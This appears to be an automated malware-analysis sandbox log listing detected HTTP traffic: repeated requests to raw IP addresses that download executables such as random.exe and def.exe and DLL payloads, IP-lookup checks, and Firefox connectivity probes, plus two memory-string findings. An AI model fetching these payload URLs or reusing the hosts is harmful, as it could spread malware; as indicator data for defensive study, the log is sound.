Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: dHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Mon, 09 Dec 2024 22:35:01 GMTIf-None-Match: "67577095-1db600"
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: sHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: dHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: sHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache

Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
